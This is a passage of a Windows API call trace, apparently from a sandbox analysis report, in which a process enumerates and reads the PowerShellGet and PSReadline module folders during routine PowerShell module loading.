ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0226.804] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0226.804] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0226.804] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0226.804] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.804] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2d0) returned 1 [0226.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe290) returned 1 [0226.804] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7fdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0226.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7fdf70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0226.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe3b0) returned 1 [0226.805] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe490 | out: lpFileInformation=0x1b7fe490*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0226.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe370) returned 1 [0226.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe3e0) returned 1 [0226.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7fded0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0226.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41 [0226.805] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x1b7fe080 | out: lpFindFileData=0x1b7fe080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf910 [0226.805] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.805] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.806] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0226.806] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0226.806] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0226.806] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0226.807] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0226.807] FindClose (in: hFindFile=0x1a5cf910 | out: hFindFile=0x1a5cf910) returned 1 [0226.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe330) returned 1 [0226.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2f0) returned 1 [0226.807] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0226.807] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0226.807] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0226.807] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0226.807] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0226.807] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0226.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.808] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.808] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.808] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0226.808] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39 [0226.808] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.808] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.808] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0226.808] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.809] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.809] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x1b7fe170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0226.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe5b0) returned 1 [0226.810] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe690 | out: lpFileInformation=0x1b7fe690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4)) returned 1 [0226.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe570) returned 1 [0226.810] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0226.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe350) returned 1 [0226.810] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x564 [0226.818] GetFileType (hFile=0x564) returned 0x1 [0226.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2c0) returned 1 [0226.819] GetFileType (hFile=0x564) returned 0x1 [0226.819] ReadFile (in: hFile=0x564, lpBuffer=0x249e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x249e100*, lpNumberOfBytesRead=0x1b7fe428*=0x1000, lpOverlapped=0x0) returned 1 [0226.819] ReadFile (in: hFile=0x564, lpBuffer=0x249e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x249e100*, lpNumberOfBytesRead=0x1b7fe428*=0x1000, lpOverlapped=0x0) returned 1 [0226.819] ReadFile (in: hFile=0x564, lpBuffer=0x249e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x249e100*, lpNumberOfBytesRead=0x1b7fe428*=0x1000, lpOverlapped=0x0) returned 1 [0226.820] ReadFile (in: hFile=0x564, lpBuffer=0x249e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x249e100*, lpNumberOfBytesRead=0x1b7fe428*=0x1000, lpOverlapped=0x0) returned 1 [0226.820] ReadFile (in: hFile=0x564, lpBuffer=0x249e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x249e100*, lpNumberOfBytesRead=0x1b7fe428*=0x1000, lpOverlapped=0x0) returned 1 [0226.820] ReadFile (in: hFile=0x564, lpBuffer=0x249e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x249e100*, lpNumberOfBytesRead=0x1b7fe428*=0xac4, lpOverlapped=0x0) returned 1 [0226.820] ReadFile (in: hFile=0x564, lpBuffer=0x249d704, nNumberOfBytesToRead=0x13c, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x249d704*, lpNumberOfBytesRead=0x1b7fe428*=0x0, lpOverlapped=0x0) returned 1 [0226.820] ReadFile (in: hFile=0x564, lpBuffer=0x249e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x249e100*, lpNumberOfBytesRead=0x1b7fe428*=0x0, lpOverlapped=0x0) returned 1 [0226.821] CloseHandle (hObject=0x564) returned 1 [0226.822] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0226.822] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0226.822] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0226.822] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0226.822] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0226.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.822] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0226.823] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", lpFilePart=0x0) returned 0x36 [0226.823] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.823] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.823] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0226.823] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.824] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0226.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", lpFilePart=0x0) returned 0x36 [0226.824] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.824] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.824] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0226.825] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: 